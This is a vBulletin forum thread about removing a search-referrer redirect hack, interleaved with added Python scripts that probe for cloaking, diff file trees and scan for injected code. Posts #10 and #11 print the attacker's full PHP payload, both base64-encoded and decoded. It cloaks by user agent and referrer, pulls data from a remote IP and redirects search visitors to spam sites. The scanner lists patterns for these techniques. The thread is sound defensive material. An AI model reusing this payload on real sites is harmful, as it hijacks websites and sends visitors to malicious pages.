Forum hijacked/redirected - URGENT PLEASE HELP

  • madkeen
    Member
    • Jan 2007
    • 48
    • 3.6.x

    If you do a search on Google for my site or any major keywords and then click on one of the links/results that lists my forum, you end up at another site (spam/malware, etc.). If you click on a result that is a standard HTML page you go to the site.

    If you type the URL in directly in the browser it works fine.

    Anyone know how I can fix this and stop it happening again?

    Thanks
    Last edited by madkeen; Tue 2 Feb '10, 5:29am.
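The symptom in the opening post (a direct visit is clean, a click from a search result is not) is referrer-based cloaking, and the quickest way to confirm it is to request the same URL with different request headers and see who gets sent where. The probe below is an added example, not code from this thread or from vBulletin: it fetches a URL as a plain browser, as a browser that arrived from Google, and as Googlebot, refuses to follow redirects so the Location header stays visible, and reports any 3xx or meta refresh that points off the site. The profile headers, the `forum.example` host used in the checks, and the command-line URL are assumptions.

```python
"""Probe a forum URL for referrer/user-agent cloaking (added example, not the thread's code).

The three request profiles are assumptions; a clean site answers all three the same way.
"""
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import urlparse

PROFILES = {
    "direct":      {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6"},
    "from-google": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6",
                    "Referer": "http://www.google.com/search?q=example"},
    "googlebot":   {"User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)"},
}

# <meta http-equiv="refresh" content="0;url=..."> as used by the crawler branch of the payload
META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]+content=["\']?\s*\d+\s*;\s*url=([^"\'>\s]+)',
    re.IGNORECASE)


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Hand 3xx responses back instead of following them, so the Location is visible."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def classify(status, headers, body, site_host):
    """Summarise one response: is the visitor sent somewhere, and is it off-site?"""
    h = {k.lower(): v for k, v in headers.items()}
    kind, target = "ok", None
    if 300 <= status < 400 and "location" in h:
        kind, target = "redirect", h["location"]
    else:
        m = META_REFRESH.search(body)
        if m:
            kind, target = "meta-refresh", m.group(1)
    offsite = False
    if target:
        thost = urlparse(target).hostname
        offsite = bool(thost) and thost.lower() != site_host.lower()
    return {"kind": kind, "target": target, "offsite": offsite}


def cloaking_verdict(results):
    """Cloaked = the direct visit is clean but a search visitor or crawler is sent elsewhere."""
    direct_clean = results["direct"]["kind"] == "ok"
    diverted = sorted(n for n, r in results.items() if n != "direct" and r["kind"] != "ok")
    return direct_clean and bool(diverted), diverted


def probe(url):
    """Fetch url once per profile without following redirects; returns {profile: classify(...)}."""
    host = urlparse(url).hostname or ""
    opener = urllib.request.build_opener(NoRedirect())
    results = {}
    for name, hdrs in PROFILES.items():
        req = urllib.request.Request(url, headers=hdrs)
        try:
            with opener.open(req, timeout=15) as resp:
                status, headers, body = resp.getcode(), dict(resp.headers), resp.read(65536)
        except urllib.error.HTTPError as e:  # with NoRedirect, 3xx responses arrive here too
            status, headers, body = e.code, dict(e.headers), e.read(65536)
        results[name] = classify(status, headers, body.decode("utf-8", "replace"), host)
    return results


if __name__ == "__main__":
    res = probe(sys.argv[1])
    for name, r in res.items():
        print(f"{name:12s} {r['kind']:13s} offsite={r['offsite']} target={r['target']}")
    cloaked, who = cloaking_verdict(res)
    print("CLOAKED for:", ", ".join(who) if cloaked else "nobody")
```

Run it as `python probe.py http://your-forum/forum/` from a machine outside the server. A same-host meta refresh for the crawler profile is also worth a look: the payload quoted later in this thread feeds crawlers a keyword "doorway" page that refreshes to the forum's own URL with an added query string.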
  • BBR-APBT
    Senior Member
    • Nov 2005
    • 456

    #2
    You have some sort of redirect in your PHP files if the referrer is Google.

    This is done via your ads or directly in your code.
    My statements are based on the forums not the CMS as I do not and will not use it.
    If I wanted faulty software I would code it myself. When I pay I expect to get what is advertised. I do not feel I got what I paid for.
    In an honest opinion I feel I paid for vB 5.0 beta 7

    • madkeen
      Member
      • Jan 2007
      • 48
      • 3.6.x

      #3
      Yes, I know that, but where in the code and how do I fix it?
      What do I look for, etc., etc., etc.?

      • Trevor Hannant
        vBulletin Support
        • Aug 2002
        • 24358
        • 5.7.X

        #4
        What version of vBulletin are you running? First step is to upload all the original vBulletin files to your server overwriting what's already there. If it's not the latest that is available under your license, then you should consider upgrading at this point also.

        Do you have modifications/plugins installed? Are they the most up to date?

        Check for amended templates - did you make the amendments? Create a new style and choose no parent style. This will force it to use the default templates. Finally empty your browser cache, close all browser windows then try again. Make sure you change to the new style and view your forums with it.

        Do you have the same problem?
        Vote for:

        - Admin Settable Paid Subscription Reminder Timeframe (vB6)
        - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)
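Trevor's first step (re-upload the original vBulletin files over the live ones) removes whatever was injected, but it does not tell you what was touched, and that list is what you need to judge the scope of the compromise. The script below is an added example, not vBulletin's own tooling: it hashes every file in a pristine unpacked copy of the same release and in the live tree, then reports modified, added and missing files. Added files (a `.htaccess` the distribution never shipped, a stray `.php` under an image or attachment directory) deserve as much attention as modified ones. It assumes `includes/config.php` is the one file you legitimately edited; adjust `EXPECTED_LOCAL` to match your install. The demo trees it builds are constructed for illustration.

```python
"""Diff a live vBulletin tree against a pristine copy of the same release (added example)."""
import hashlib
import os
import shutil
import sys
import tempfile

# Files expected to differ from the distribution. Assumption: only config.php was edited locally.
EXPECTED_LOCAL = {"includes/config.php"}


def hash_tree(root):
    """Map relative path -> SHA-256 of every regular file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(1 << 20), b""):
                    h.update(chunk)
            digests[os.path.relpath(full, root).replace(os.sep, "/")] = h.hexdigest()
    return digests


def diff_trees(clean_root, live_root):
    """Return modified, added and missing files as sorted relative paths."""
    clean, live = hash_tree(clean_root), hash_tree(live_root)
    return {
        "modified": sorted(p for p in clean
                           if p in live and clean[p] != live[p] and p not in EXPECTED_LOCAL),
        "added":    sorted(p for p in live if p not in clean),
        "missing":  sorted(p for p in clean if p not in live),
    }


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(text)


def run_demo():
    """Constructed trees standing in for the distribution and a compromised install."""
    base = tempfile.mkdtemp()
    clean, live = os.path.join(base, "clean"), os.path.join(base, "live")
    for root in (clean, live):
        _write(root, "global.php", "<?php\nrequire_once('./includes/init.php');\n")
        _write(root, "index.php", "<?php\nrequire_once('./global.php');\n")
        _write(root, "includes/config.php", "<?php\n$config['Database']['dbname'] = 'forum';\n")
    # Live copy: an eval() prepended to global.php, a new .htaccess, a dropped file, an edited config
    _write(live, "global.php",
           "<?php\neval(base64_decode('ZWNobyAxOw=='));\nrequire_once('./includes/init.php');\n")
    _write(live, ".htaccess", "RewriteEngine On\n")
    _write(live, "images/misc/x.php", "<?php /* file not in the distribution */\n")
    _write(live, "includes/config.php", "<?php\n$config['Database']['dbname'] = 'livedb';\n")
    try:
        return diff_trees(clean, live)
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    result = diff_trees(sys.argv[1], sys.argv[2]) if len(sys.argv) == 3 else run_demo()
    for kind, paths in result.items():
        for p in paths:
            print(f"{kind:9s} {p}")
```

Usage: `python vbdiff.py /tmp/vbulletin-3.6.x-clean /var/www/forum`. Hash the clean copy from the archive you downloaded from the members' area, not from a backup taken after the symptoms started.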

        • BBR-APBT
          Senior Member
          • Nov 2005
          • 456

          #5
          Check in your .htaccess file. Seems this happened to a few sites.
          That's where the redirect is, I believe.

          However, someone had access to your hosting account to edit that file.

          It is safe to say you have been compromised.

          Rename your .htaccess file .htaccess.compromised and create a new .htaccess file without the exploit code. This is only a temporary fix, as these hacks often include backdoors and viruses that will try to restore the bad .htaccess file.


          You will have to re-upload all your files from a backup. As Trevor said, check for amended templates - did you make the amendments?
          Last edited by BBR-APBT; Tue 2 Feb '10, 6:11am.

          • madkeen
            Member
            • Jan 2007
            • 48
            • 3.6.x

            #6
            Thanks for your help

            Found several .htaccess files in various directories

            In global.php or index.php there is PHP code that makes this redirection. It's something like this:

            eval(base64_decode(SDHFUFH343BJB3TB3TJ3B34...

            Deleted that and it is working fine again.

            • BBR-APBT
              Senior Member
              • Nov 2005
              • 456

              #7
              Originally posted by madkeen
              Thanks for your help

              Found several .htaccess files in various directories

              In global.php or index.php there is PHP code that makes this redirection. It's something like this:

              eval(base64_decode(SDHFUFH343BJB3TB3TJ3B34...

              Deleted that and it is working fine again.

              You need to reinstall all your code and check your templates. You were hacked and you did not correctly fix the problem. You need to find the hole and fix it. Read my post again and follow the directions.

              • madkeen
                Member
                • Jan 2007
                • 48
                • 3.6.x

                #8
                No templates amended.


                Deleted the .htaccess files and replaced with originals.

                Will dig further but appears nothing else was changed.

                Appears that someone who logged in via FTP to upload files had spyware or similar on their system.

                • motowebmaster
                  Senior Member
                  • Mar 2006
                  • 255
                  • 3.5.x

                  #9
                  If you run your own server, install a firewall and restrict FTP so that only your network (IP Address) can use it. It is best that FTP be blocked completely, and that you use SFTP instead (and have it restricted at your firewall as well).
                  Shawn

                  • madkeen
                    Member
                    • Jan 2007
                    • 48
                    • 3.6.x

                    #10
                    Here is a copy of the exact code that was in global.php

                    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOyRodD0kX1NFUlZFUlsnSFRUUF9IT1NUJ107JHB0cz1leHBsb2RlKCI/IiwkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7JHB0PSRwdHNbMF07JHB4PSRwdHNbMV07JGhpPSRfU0VSVkVSWydTRVJWRVJfQUREUiddOyRoaT1zdHJfcmVwbGFjZSgnLicsJycsJGhpKS4iPSI7JGE9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddO2lmKGVyZWdpKCJnb29nbGUiLCRhKXx8ZXJlZ2koIkdvb2dsZWJvdCIsJGEpfHxlcmVnaSgic2x1cnAiLCRhKXx8ZXJlZ2koIm1zbmJvdCIsJGEpKXskZDE9IjIxMi4xMTcuMTY5LjEzOSI7JGYxPSIvYWxsbXlrZXkudHh0IjskZnAxPWZzb2Nrb3BlbigkZDEsODAsJGVybm8sJGVyc3RyLDMwKTtpZighJGZwMSl7cHJpbnQgIkVycjogJGVyc3RyIFskZXJub10iO31lbHNle2Z3cml0ZSgkZnAxLCJHRVQgJGYxIEhUVFAvMS4wXHJcbiIpO2Z3cml0ZSgkZnAxLCJIb3N0OiAkZDFcclxuXHJcbiIpO3doaWxlKCFmZW9mKCRmcDEpKXskaDEuPWZyZWFkKCRmcDEsNTEyKTt9ZmNsb3NlKCRmcDEpO31wcmVnX21hdGNoX2FsbCgiITxiZWdpbj4oW148XSspPGVuZD4hIiwkaDEsJG0xKTtpZihlcmVnaSgkaGksJHB4KSl7JGs9c3RyX3JlcGxhY2UoJGhpLCcnLCRweCk7ZWNobyAiPEhUTUw+PEhFQUQ+PFRJVExFPiIuc3RyX3JlcGxhY2UoJy0nLCcgJyxzdHJ0b3VwcGVyKCRrKSkuIjwvVElUTEU+PE1FVEEgaHR0cC1lcXVpdj1Db250ZW50LVR5cGUgY29udGVudD1cInRleHQvaHRtbDsgY2hhcnNldD11dGYtOFwiPjxNRVRBIGNvbnRlbnQ9XCJpbmRleCxmb2xsb3dcIiBuYW1lPVJPQk9UUz48TUVUQSBodHRwLWVxdWl2PVwiQ29udGVudC1MYW5ndWFnZVwiIGNvbnRlbnQ9XCJlblwiPjxNRVRBIGh0dHAtZXF1aXY9XCJyZWZyZXNoXCIgY29udGVudD1cIjEwXCI+PC9IRUFEPjxCT0RZPjxIMT4iLnN0cl9yZXBsYWNlKCctJywnICcsJGspLiI6PC9IMT48QlI+PEI+Ijtmb3IoJGk9MDskaTxjb3VudCgkbTFbMF0pOyRpKyspe2VjaG8gJG0xWzFdWyRpXTt9ZWNobyAiPC9CPjxCUj4iO2ZvcigkaT0wOyRpPGNvdW50KCRtMVswXSk7JGkrKyl7ZWNobyAiPEEgSFJFRj0naHR0cDovLyIuJGh0LiRwdC4iPyIuJGhpLiRtMVsxXVskaV0uIic+Ii5zdHJfcmVwbGFjZSgnLScsJyAnLCRtMVsxXVskaV0pLiI8L0E+PEJSPiI7fWVjaG8gIjxJPiI7Zm9yKCRpPTA7JGk8Y291bnQoJG0xWzBdKTskaSsrKXtlY2hvIHN0cl9yZXBsYWNlKCctJywnJywkbTFbMV1bJGldKTt9ZWNobyAiPC9JPjwvQk9EWT48L0hUTUw+IjtleGl0KCk7fSRrcz0kbTFbMV1bcmFuZCgwLGNvdW50KCRtMVswXSkpXTskdXM9Imh0dHA6Ly8iLiRodC4kcHQuIj8iLiRoaS4ka3M7ZWNobyAiPEhUTUw+PEhFQUQ+PFRJVExFPjwvVElUTEU+PE1FVEEgaHR0cC1lcXVpdj1Db250ZW50LVR5cGUgY29udGVudD1cInRleHQvaHRtbDsgY2hhcnNldD11dGYtOFwiPjxNRVRBIGNvbnRlbnQ9XCJpbmRleCxmb2xsb3dcIiBuYW1lPVJPQk9UUz48TUVUQSBodHRwLWVxdWl2PVwiQ29udGVudC1MYW5ndWFnZVwiIGNvbnRlbnQ9XCJlblwiPjxNRVRBIGh0dHAtZXF1aXY9XCJyZWZyZXNoXCIgY29udGVudD1cIjA7dXJsPSR1c1wiPjwvSEVBRD48Qk9EWT48L0JPRFk+PC9IVE1MPiI7ZXhpdCgpO30kcmE9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddO2lmKGVyZWdpKCJnb29nbGUuIiwkcmEpfHxlcmVnaSgieWFob28uIiwkcmEpfHxlcmVnaSgibGl2ZS4iLCRyYSl8fGVyZWdpKCJtc24uIiwkcmEpfHxlcmVnaSgiYmluZy4iLCRyYSkpeyRkMj0iMjEyLjExNy4xNjkuMTM5IjskZjI9Ii9yZWQudHh0IjskZnAyPWZzb2Nrb3BlbigkZDIsODAsJGVybm8sJGVyc3RyLDMwKTtpZighJGZwMil7cHJpbnQgIkVycjogJGVyc3RyIFskZXJub10iO31lbHNle2Z3cml0ZSgkZnAyLCJHRVQgJGYyIEhUVFAvMS4wXHJcbiIpO2Z3cml0ZSgkZnAyLCJIb3N0OiAkZDJcclxuXHJcbiIpO3doaWxlKCFmZW9mKCRmcDIpKXskaDIuPWZyZWFkKCRmcDIsNTEyKTt9ZmNsb3NlKCRmcDIpO31wcmVnX21hdGNoX2FsbCgiITxiZWdpbj4oW148XSspPGVuZD4hIiwkaDIsJG0yKTskcj0kbTJbMV1bYXJyYXlfcmFuZCgkbTIpXTskcj0kci4iPyIuJHJhO2hlYWRlcigiSFRUUC8xLjEgMzAyIik7aGVhZGVyKCJMb2NhdGlvbjogJHIiKTtleGl0KCk7fQ=='));

                    • BBR-APBT
                      Senior Member
                      • Nov 2005
                      • 456

                      #11
                      And here is the PHP code that was inserted, decoded.

                      Code:
                      error_reporting(0);
                      $ht  = $_SERVER['HTTP_HOST'];
                      $pts = explode("?", $_SERVER['REQUEST_URI']);
                      $pt  = $pts[0];
                      $px  = $pts[1];
                      $hi  = $_SERVER['SERVER_ADDR'];
                      $hi  = str_replace('.', '', $hi) . "=";   // server IP with dots stripped, used as a query-string marker
                      $a   = $_SERVER['HTTP_USER_AGENT'];

                      // Branch 1: search-engine crawlers get a keyword "doorway" page built from a list fetched from 212.117.169.139
                      if (eregi("google", $a) || eregi("Googlebot", $a) || eregi("slurp", $a) || eregi("msnbot", $a)) {
                          $d1 = "212.117.169.139";
                          $f1 = "/allmykey.txt";
                          $fp1 = fsockopen($d1, 80, $erno, $erstr, 30);
                          if (!$fp1) {
                              print "Err: $erstr [$erno]";
                          } else {
                              fwrite($fp1, "GET $f1 HTTP/1.0\r\n");
                              fwrite($fp1, "Host: $d1\r\n\r\n");
                              while (!feof($fp1)) {
                                  $h1 .= fread($fp1, 512);
                              }
                              fclose($fp1);
                          }
                          preg_match_all("!<begin>([^<]+)<end>!", $h1, $m1);   // keywords are wrapped in <begin>...<end>
                          if (eregi($hi, $px)) {
                              // Request already carries the marker: render the doorway page for this keyword
                              $k = str_replace($hi, '', $px);
                              echo "<HTML><HEAD><TITLE>" . str_replace('-', ' ', strtoupper($k)) . "</TITLE><META http-equiv=Content-Type content=\"text/html; charset=utf-8\"><META content=\"index,follow\" name=ROBOTS><META http-equiv=\"Content-Language\" content=\"en\"><META http-equiv=\"refresh\" content=\"10\"></HEAD><BODY><H1>" . str_replace('-', ' ', $k) . ":</H1><BR><B>";
                              for ($i = 0; $i < count($m1[0]); $i++) {
                                  echo $m1[1][$i];
                              }
                              echo "</B><BR>";
                              for ($i = 0; $i < count($m1[0]); $i++) {
                                  echo "<A HREF='http://" . $ht . $pt . "?" . $hi . $m1[1][$i] . "'>" . str_replace('-', ' ', $m1[1][$i]) . "</A><BR>";
                              }
                              echo "<I>";
                              for ($i = 0; $i < count($m1[0]); $i++) {
                                  echo str_replace('-', '', $m1[1][$i]);
                              }
                              echo "</I></BODY></HTML>";
                              exit();
                          }
                          // Otherwise bounce the crawler to a random keyword URL on this host via a 0-second meta refresh
                          $ks = $m1[1][rand(0, count($m1[0]))];
                          $us = "http://" . $ht . $pt . "?" . $hi . $ks;
                          echo "<HTML><HEAD><TITLE></TITLE><META http-equiv=Content-Type content=\"text/html; charset=utf-8\"><META content=\"index,follow\" name=ROBOTS><META http-equiv=\"Content-Language\" content=\"en\"><META http-equiv=\"refresh\" content=\"0;url=$us\"></HEAD><BODY></BODY></HTML>";
                          exit();
                      }

                      // Branch 2: a visitor who arrived from a search engine gets a 302 to a URL fetched from the same host
                      $ra = $_SERVER['HTTP_REFERER'];
                      if (eregi("google.", $ra) || eregi("yahoo.", $ra) || eregi("live.", $ra) || eregi("msn.", $ra) || eregi("bing.", $ra)) {
                          $d2 = "212.117.169.139";
                          $f2 = "/red.txt";
                          $fp2 = fsockopen($d2, 80, $erno, $erstr, 30);
                          if (!$fp2) {
                              print "Err: $erstr [$erno]";
                          } else {
                              fwrite($fp2, "GET $f2 HTTP/1.0\r\n");
                              fwrite($fp2, "Host: $d2\r\n\r\n");
                              while (!feof($fp2)) {
                                  $h2 .= fread($fp2, 512);
                              }
                              fclose($fp2);
                          }
                          preg_match_all("!<begin>([^<]+)<end>!", $h2, $m2);
                          $r = $m2[1][array_rand($m2)];
                          $r = $r . "?" . $ra;   // the original referrer is passed along to the landing site
                          header("HTTP/1.1 302");
                          header("Location: $r");
                          exit();
                      }
                      // Anyone else (direct visitors, the site owner) falls through to the normal forum code

                      • GCC LLC
                        New Member
                        • Oct 2005
                        • 27
                        • 3.5.x

                        #12
                        Hey guys, this happened to me as well, and the base64_decode stuff was inserted inside my database, in either one of the plugins (once it was inserted inside VBSEO in vbseo_start), and the last time it seemed to just be inserted inside the datastore table. It's easy to remove at this point and I have an alert set up to tell me when it's happened, but we really need to figure out if it's vB that's allowing this or one of the plugins. Are either of you running the vB blog software? I'm trying to narrow it down based on some things I've seen in my server logs. Let's work together and figure this thing out!
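Posts #6, #10 and #11 found the injection by reading global.php by hand, and the post above notes the same blob can live in the database (plugin code, the datastore) rather than on disk. The scanner below is an added example, not anything from the thread or from vBulletin. It generalises what those posts found: an opaque literal fed to `eval()`, `assert()` or `preg_replace()` through `base64_decode()` (optionally inside `gzinflate()`), decoded and checked for the behaviours the decoded payload above exhibits (referrer and user-agent checks naming search engines, a socket fetch from a remote host, a `Location:` header or meta refresh, `error_reporting(0)`), plus `.htaccess` `RewriteCond` lines keyed on the referrer or user agent, which is the .htaccess variant BBR-APBT mentions. `scan_text()` takes any string, so the same check can be run over rows pulled from the plugin and datastore tables. The demo payload and the 203.0.113.10 address it uses are constructed; `str_rot13` layers are not undone.

```python
"""Scan a web root for eval(base64_decode(...)) injections and cloaking rules (added example)."""
import base64
import os
import re
import shutil
import sys
import tempfile
import zlib

# An eval-family sink wrapping one or more decoders and a long opaque literal.
OBFUSCATED = re.compile(
    r"\b(eval|assert|preg_replace)\s*\(\s*"
    r"(?:@?\s*(?:gzinflate|base64_decode)\s*\(\s*)+"
    r"['\"]([A-Za-z0-9+/=\s]{40,})['\"]",
    re.IGNORECASE)

# Behaviours worth flagging once a payload is decoded.
INDICATORS = {
    "referrer-cloaking":   re.compile(r"HTTP_REFERER", re.I),
    "crawler-cloaking":    re.compile(r"HTTP_USER_AGENT|googlebot|slurp|msnbot", re.I),
    "search-engine-match": re.compile(r"google|yahoo|bing|msn", re.I),
    "remote-fetch":        re.compile(r"fsockopen|curl_init|file_get_contents\s*\(\s*['\"]https?://", re.I),
    "redirect":            re.compile(r"header\s*\(\s*['\"]Location:|http-equiv=\\?['\"]?refresh", re.I),
    "errors-silenced":     re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
}

# .htaccess conditions that single out search-engine referrers or crawlers.
HTACCESS_CLOAK = re.compile(
    r"RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}\s+\S*(google|yahoo|bing|msn)",
    re.IGNORECASE)


def decode_layers(blob, inflate=False, depth=5):
    """Peel nested base64 (and gzinflate) layers. Whitespace inside the literal is ignored, as PHP does."""
    text = blob
    for _ in range(depth):
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", text), validate=True)
            if inflate:
                raw = zlib.decompress(raw, -15)  # gzinflate() is raw DEFLATE
        except (ValueError, zlib.error):
            return text
        text = raw.decode("utf-8", "replace")
        m = OBFUSCATED.search(text)
        if not m:
            return text
        text, inflate = m.group(2), "gzinflate" in m.group(0).lower()
    return text


def scan_text(text, origin):
    """Findings for one string: a file's contents, a .htaccess, or a code column from the database."""
    findings = []
    for m in OBFUSCATED.finditer(text):
        decoded = decode_layers(m.group(2), inflate="gzinflate" in m.group(0).lower())
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
        findings.append({"origin": origin, "sink": m.group(1).lower(),
                         "line": text.count("\n", 0, m.start()) + 1,
                         "indicators": hits, "preview": decoded[:80]})
    for m in HTACCESS_CLOAK.finditer(text):
        findings.append({"origin": origin, "sink": "RewriteCond",
                         "line": text.count("\n", 0, m.start()) + 1,
                         "indicators": ["htaccess-" + m.group(1).lower()], "preview": m.group(0)})
    return findings


def scan_tree(root):
    """Walk root, scanning every .php file and every .htaccess."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php") or name == ".htaccess":
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as f:
                    findings.extend(scan_text(f.read(), os.path.relpath(path, root)))
    return findings


# Constructed stand-in for the payload quoted above: referrer check, remote fetch, 302 redirect.
DEMO_PAYLOAD = (
    "error_reporting(0);$ra=$_SERVER['HTTP_REFERER'];"
    "if(eregi(\"google.\",$ra)||eregi(\"bing.\",$ra)){"
    "$fp=fsockopen(\"203.0.113.10\",80,$en,$es,30);"
    "header(\"HTTP/1.1 302\");header(\"Location: http://203.0.113.10/r?\".$ra);exit();}"
)


def run_demo():
    """Build a small fake web root with the injection and a cloaking .htaccess, then scan it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "forum"))
    b64 = base64.b64encode(DEMO_PAYLOAD.encode()).decode()
    files = {
        "forum/global.php": "<?php\neval(base64_decode('" + b64 + "'));\nrequire_once('./includes/init.php');\n",
        "forum/index.php": "<?php\nrequire_once('./global.php');\n",
        "forum/.htaccess": "RewriteEngine On\nRewriteCond %{HTTP_REFERER} .*google.* [NC]\n"
                           "RewriteRule .* http://203.0.113.10/ [R,L]\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w") as f:
            f.write(content)
    try:
        return scan_tree(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else run_demo()
    for h in hits:
        print(f"{h['origin']}:{h['line']} {h['sink']}() {', '.join(h['indicators'])}  {h['preview']!r}")
```

Run `python vbscan.py /var/www/forum` over the live tree (and over the `.htaccess` files madkeen found in other directories); with no argument it scans the constructed demo. A finding is a place to read, not proof by itself: a legitimate add-on can ship base64 literals, but one that decodes to a referrer check, a socket to a bare IP and a `Location:` header is the pattern this thread documents.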
